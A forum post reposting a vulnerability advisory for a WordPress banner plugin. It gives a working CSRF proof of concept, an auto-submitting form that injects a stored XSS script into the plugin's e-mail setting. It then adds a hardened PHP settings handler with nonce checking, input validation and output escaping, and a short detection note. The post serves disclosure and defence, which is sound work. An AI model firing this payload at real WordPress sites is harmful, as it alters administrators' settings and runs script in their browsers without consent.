Aerosol Posted January 6, 2015

-------------------------------------------------------------------------
[*] Exploit Title: Wordpress Banner Effect Header 1.2.6 Plugin XSS, CSRF Vulnerability
[*] Date: 2015-01-02
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage: https://wordpress.org/plugins/banner-effect-header/
[*] Plugin Link: https://downloads.wordpress.org/plugin/banner-effect-header.zip
[*] Tested on: Windows 7
[*] Discovered By: Mahdi.Hidden
-------------------------------------------------------------------------

[*] Location: http://[localhost]/[path]/wp-admin/options-general.php?page=BannerEffectOptions
-------------------------------------------------------------------------

Exploit Code:

<html>
<body>
<form name="post_form" method="post" action="http://localhost/wordpress/wp-admin/options-general.php?page=BannerEffectOptions">
<input type="hidden" name="banner_effect_submit_hidden" value="Y">
<input type="hidden" name="banner_effect_email" value='a@a.com"><script>alert(/xss/)</script>'>
<script language="Javascript">setTimeout('post_form.submit()', 1);</script>
</form>
</body>
</html>

-------------------------------------------------------------------------
This is CSRF & XSS
-------------------------------------------------------------------------
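A hardened version of the settings handler this advisory targets, as an added example that is not the plugin's code: the handler shape, the capability check and the option name are assumptions, and only the two POST field names come from the advisory above. It shows the three controls whose absence the PoC relies on: a nonce check that rejects a form submitted from another origin, input validation of the e-mail value, and attribute escaping when the stored value is echoed back.

```php
<?php
// Added example (not the plugin's own code): hardened settings handler.
// Only the POST field names banner_effect_submit_hidden / banner_effect_email
// come from the advisory; everything else here is an assumed reconstruction.

function banner_effect_options_page() {
    // Control 1: only users allowed to manage options may reach this handler.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    if ( isset( $_POST['banner_effect_submit_hidden'] ) && $_POST['banner_effect_submit_hidden'] === 'Y' ) {
        // Control 2 (CSRF): a nonce bound to this action must accompany the POST.
        // A form hosted on another site cannot obtain it, so the request dies here.
        check_admin_referer( 'banner_effect_save', 'banner_effect_nonce' );

        // Control 3 (input validation): accept only a well-formed e-mail address,
        // so a value that closes the attribute and opens a <script> is never stored.
        $email = sanitize_email( wp_unslash( $_POST['banner_effect_email'] ) );
        if ( $email === '' || ! is_email( $email ) ) {
            add_settings_error( 'banner_effect', 'bad_email', 'Please enter a valid e-mail address.' );
        } else {
            update_option( 'banner_effect_email', $email ); // option name is an assumption
        }
    }

    $saved = get_option( 'banner_effect_email', '' );
    ?>
    <div class="wrap">
        <form method="post" action="">
            <?php wp_nonce_field( 'banner_effect_save', 'banner_effect_nonce' ); ?>
            <input type="hidden" name="banner_effect_submit_hidden" value="Y">
            <!-- Control 4 (XSS): esc_attr() encodes quotes and angle brackets, so a
                 stored value cannot break out of the attribute when rendered. -->
            <input type="text" name="banner_effect_email"
                   value="<?php echo esc_attr( $saved ); ?>">
            <?php submit_button(); ?>
        </form>
    </div>
    <?php
}
```

Detection note: with the nonce check in place, a failed check surfaces as WordPress's "The link you followed has expired." page, which is the signal to look for when triaging reports of this PoC against patched installs.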